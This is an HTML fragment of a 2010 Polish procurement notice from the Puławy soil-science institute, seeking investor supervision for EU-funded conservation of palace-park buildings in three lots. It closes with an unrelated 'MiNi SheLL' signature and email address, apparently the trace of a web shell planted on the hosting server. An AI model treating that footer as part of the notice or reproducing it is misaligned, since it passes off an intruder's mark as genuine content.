<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy w  Puławach ul. Czartoryskich 8, 24-100 Puławy, pokój do spraw zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 12:00, miejsce: Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy w  Puławach ul. Czartoryskich 8, 24-100 Puławy, Sekretariat Instytutu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Finansowane  w ramach projektu: pt. Rewaloryzacja i konserwacja Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach z przeznaczeniem na cele kulturalno - turystyczne -17 09-WND-RPLU07.01.00-06-018 09 w ramach Osi Priorytetowej VII Kultura, turystyka i współpraca międzyregionalna, Działania 7.1 Infrastruktura kultury i turystyki, Kategoria I: Ochrona dziedzictwa kulturowego - projekty lokalne w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007- 2013
2)Finansowane  w ramach projektu: pt. Remont Konserwatorski Świątyni Sybilli i Domu Gotyckiego w Puławach  -17 09-WND-RPLU07.01.00-06-019 09 w ramach Osi Priorytetowej VII Kultura, turystyka i współpraca międzyregionalna, Działania 7.1 Infrastruktura kultury i turystyki, Kategoria I: Ochrona dziedzictwa kulturowego - projekty lokalne w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007- 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego dla obiektów usytuowanych na terenie osady pałacowo parkowej IUNG - PIB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I pełnienie nadzoru inwestorskiego dla projektu Remont Konserwatorski Świątyni Sybilli i Domu Gotyckiego w Puławach, który będzie polegał na :
1)Remont Konserwatorski Świątyni Sybilli w Puławach 
Zakres prac które musi wykonać wykonawca robót :
a)	Prace remontowo budowlane
b)	Remont ścian przyziemia 
c)	Remont i wzmocnienie ścian oraz tynki renowacyjne,
d)	Remont tarasu,
e)	Remont ceramicznych powierzchni      ścian zewnętrznych
f)	Remont dachu,
g)	Roboty kamieniarskie,
h)	Opaska zabezpieczająca i odprowadzenie wód opadowych
i)	Remontu konserwatorski elewacji i stolarki
j)	Renowacja i konserwacja elementów kamiennych
k)	Renowacja stolarki drzwiowej
l)	Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego).

Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę 
2)Remont Konserwatorski Domu Gotyckiego w Puławach
 Zakres prac które musi wykonać wykonawca robót :
a)	Prace remontowo budowlane
b)	Hydroizolacja ścian fundamentowych
c)	Remont i wzmocnienie ścian zewnętrznych,
d)	Remont tarasu,
e)	Remont dachu,
f)	Cokół kamienny i zewnętrzna posadzka
g)	Projekt remontu konserwatorskiego elewacji i stolarki
h)	Renowacja tynków zewnętrznych i detali architektonicznych
i)	Renowacja i konserwacja elementów kamiennych
j)	Renowacja stolarki okiennej i drzwiowej
k)	Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego)
Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego dla obiektów usytuowanych na terenie osady pałacowo parkowej IUNG - PIB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  II : pełnienie nadzoru inwestorskiego dla projektu Rewaloryzację i konserwację Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
1)Rewaloryzacja i konserwacja Domku Żółtego  
Zakres prac które musi wykonać wykonawca robót :
a.	Prace remontowo budowlane
b.	Remont ścian przyziemia 
c.	Remont i wzmocnienie ścian oraz tynki renowacyjne,
d.	Remont tarasu,
e.	Remont dachu,
f.	Roboty kamieniarskie,
g.	Opaska zabezpieczająca i odprowadzenie wód opadowych
h.	Remontu konserwatorski elewacji i stolarki
i.	Renowacja i konserwacja elementów kamiennych
j.	Renowacja stolarki drzwiowej
k.	Wymiana stolarki okiennej
l.	Wykonanie instalacji sanitarnych ( wod- kan, co., cw., wentylacja)
m.	Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego).
Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę 

2)Rewaloryzacja i konserwacja części Pałacu ks. Czartoryskich ( Sala Rycerska, Główna klatka schodowa, Sala kamienna, Sala Gotycka, Sień Główna )
  Zakres prac które musi wykonać wykonawca robót :
a)	Prace remontowo budowlane
b)	Konserwacja wystroju sztukatorskiego ścian i sufitów 
c)	Konserwacja drewnianych drzwi wraz z ościeżami 
d)	Wymiana posadzek drewnianych 
e)	Konserwacja elementów kamiennych 
f)	Konserwacja kamiennych posadzek
g)	Wymiana drewnianych okładzin schodowych
h)	Renowacja stolarki okiennej 
i)	Oczyszczenie z farb malarskich wraz z uzupełnieniem o brakujące elementy żeliwnej konstrukcji klatki schodowej
j)	Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego)

Powyższy zakres prac został szczegółowo określony w opisie przedmiotu zamówienia, inwestorskich przedmiarach robót , projektach budowlanych (opis i rysunki)  specyfikacjach wykonania robót oraz Pozwoleniach na budowę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego dla obiektów usytuowanych na terenie osady pałacowo parkowej IUNG - PIB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III pełnienie nadzoru inwestorskiego w czasie instalacji systemów zabezpieczeń i monitoringu. 
 Zakres prac które musi wykonać wykonawca robót :
1)Zamontowanie systemów zabezpieczeń ( systemu włamania i napadu , systemu przeciwpożarowego) dla:
a)	Świątyni Sybilli i Domu Gotyckiego 
b)	Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
2)Zamontowanie systemów monitoringu dla:
a)	Świątyni Sybilli i Domu Gotyckiego 
b)	Domku Żółtego i części Pałacu ks. Czartoryskich w Puławach
 
Szczegółowy zakres prac został określony w opisie przedmiotu zamówienia oraz inwestorski przedmiar robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com